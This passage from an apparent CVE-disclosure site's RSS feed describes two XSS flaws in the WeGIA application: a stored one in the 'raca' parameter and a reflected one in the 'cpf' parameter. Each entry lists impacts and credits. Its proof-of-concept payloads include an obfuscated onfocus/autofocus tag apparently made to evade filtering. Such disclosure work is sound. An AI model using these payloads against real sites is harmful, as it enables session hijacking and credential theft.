&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/pet/adicionar_raca.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;raca&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53931/image.png&amp;#34;
	width=&amp;#34;1321&amp;#34;
	height=&amp;#34;325&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53931/image_hu_2ea3161f08493fe2.png 480w, /p/cve-2025-53931/image_hu_abc31e9ddb1e0d31.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;406&amp;#34;
		data-flex-basis=&amp;#34;975px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53931/image-1.png&amp;#34;
	width=&amp;#34;1268&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53931/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53931/image-1_hu_4cccc1269b2a5680.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;515&amp;#34;
		data-flex-basis=&amp;#34;1237px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53932</title>
        <link>https://www.cvehunters.com/p/cve-2025-53932/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53932/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53932-cross-site-scripting-xss-reflected-endpoint-cadastro_adotantephp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-53932: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/pet/adotantes/cadastro_adotante.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;lt;iNput///type=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;password&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;////id=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CF&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;bypaSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;%20name=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;query&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;////value=&amp;amp;#34;&amp;amp;#34;///oNfocUs=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;chux&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;%20AutOfoCus=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53932/image.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;314&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53932/image_hu_f54c74625795f79f.png 480w, /p/cve-2025-53932/image_hu_1a0f9a99ae4c4208.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;432&amp;#34;
		data-flex-basis=&amp;#34;1038px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53932-cross-site-scripting-xss-reflected-endpoint-cadastro_adotantephp-parameter-cpf&amp;#34;&amp;gt;CVE-2025-53932: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53932&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastro_adotante.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/pet/adotantes/cadastro_adotante.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;lt;iNput///type=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;password&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;////id=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CF&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;bypaSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;%20name=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;query&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;////value=&amp;amp;#34;&amp;amp;#34;///oNfocUs=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;chux&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;%20AutOfoCus=&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53932/image.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;314&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53932/image_hu_f54c74625795f79f.png 480w, /p/cve-2025-53932/image_hu_1a0f9a99ae4c4208.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;432&amp;#34;
		data-flex-basis=&amp;#34;1038px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
